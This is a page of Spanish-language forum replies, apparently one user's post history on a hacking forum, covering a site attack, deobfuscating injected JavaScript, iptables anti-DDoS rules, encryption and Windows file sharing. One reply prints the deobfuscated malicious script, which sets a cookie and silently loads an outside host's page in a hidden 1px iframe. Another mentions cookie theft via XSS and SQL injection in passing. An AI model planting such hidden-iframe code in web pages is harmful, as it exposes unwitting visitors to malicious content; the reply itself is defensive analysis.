Mensajes

no, no era la verdad  xD

Aparece el mensaje "Optimizando la base de datos" cuando no se puede establecer la conexión MySQL con la bd del foro.

Ayer, al igual que el domingo recibimos un ataque sobre la hora que comentas.


3,400 qps (queries per second) son muchas consultas por segundo 

según sea el bug xss se puede robar la cookie. Para modificar ficheros no es necesario usar ftp, quizás hay algún tipo de rfi o con sql injection también se puede hacer.

El código javascript desofucasdo es:

Código (javascript) [Seleccionar] Expandir

function zzzfff() {

   var clt = document.createElement('iframe');



   clt.src = 'http://www.royaltysteamcleaning.com/cnt.php';

   clt.style.position = 'absolute';

   clt.style.border = '0';

   clt.style.height = '1px';

   clt.style.width = '1px';

   clt.style.left = '1px';

   clt.style.top = '1px';



   if (!document.getElementById('clt')) {

       document.write('<div id=\'clt\'></div>');

       document.getElementById('clt').appendChild(clt);

   }

}

function SetCookie(cookieName,cookieValue,nDays,path) {

var today = new Date();

var expire = new Date();

if (nDays==null || nDays==0) nDays=1;

expire.setTime(today.getTime() + 3600000*24*nDays);

document.cookie = cookieName+"="+escape(cookieValue)

                + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");

}

function GetCookie( name ) {

var start = document.cookie.indexOf( name + "=" );

var len = start + name.length + 1;

if ( ( !start ) &&

( name != document.cookie.substring( 0, name.length ) ) )

{

return null;

}

if ( start == -1 ) return null;

var end = document.cookie.indexOf( ";", len );

if ( end == -1 ) end = document.cookie.length;

return unescape( document.cookie.substring( len, end ) );

}

if (navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');



zzzfff();

}

}

Puedes usar el  javascript beautifer:

http://jsbeautifier.org/?without-codemirror

para limpiar un poco el código y luego usar las funciones document.write o alert para ver el contenido del eval

Código [Seleccionar] Expandir

document.write(s);
alert(s);

[Intentando detener un ataque DDoS]

Intentando detener un ataque DDoS
http://foro.elhacker.net/tutoriales_documentacion/intentando_detener_un_ataque_ddos-t137442.0.html

Una de las medidas más efectivas es usando el modulo recent de iptables:

Código [Seleccionar] Expandir

-A INPUT -p tcp --dport 80 -m state --state NEW -m recent   --set
-A INPUT -p tcp --dport 80 -m state --state NEW -m recent  --update --seconds 10 --hitcount 10 -j DROP

¿has usado el OpeniBoot?

porque no tienen office xDD

hay muchos tipos de algoritmos para cifrar, el problema es que contra más complejo y robusto es el algoritmo más tiempo de cpu consume el cifrado, y por lo tanto más lento se hace trabajar con él.

TrueCrypt es un programa multiplataforma que te permite trabajar con diferentes algoritmos y montar unidades cifradas a tu gusto.

¿no se puede traspasar espacio a otra cuenta dropbox?

[Compartir carpeta en red con Servidor de Archivos Windows Server 2008]

eso es muy fácil, cualquier Windows Server lo trae por defecto. Tan sólo tienes que asignar una carpeta para cada usuario (con su espacio predeterminado) y al logearse en el sistema Windows se mapea la unidad de acceso con toda su información en la carpeta del servidor.

Compartir carpeta en red con Servidor de Archivos Windows Server 2008
http://foro.elhacker.net/redes/compartir_carpeta_en_red_con_servidor_de_archivos_windows_server_2008-t293997.0.html

se habrá creado un índice.

correcto, no es más que publicidad.....

Si que es verdad que sale bien grande Oracle(Sun) en un rack de ordenadores un par de veces en la película. El que paga manda...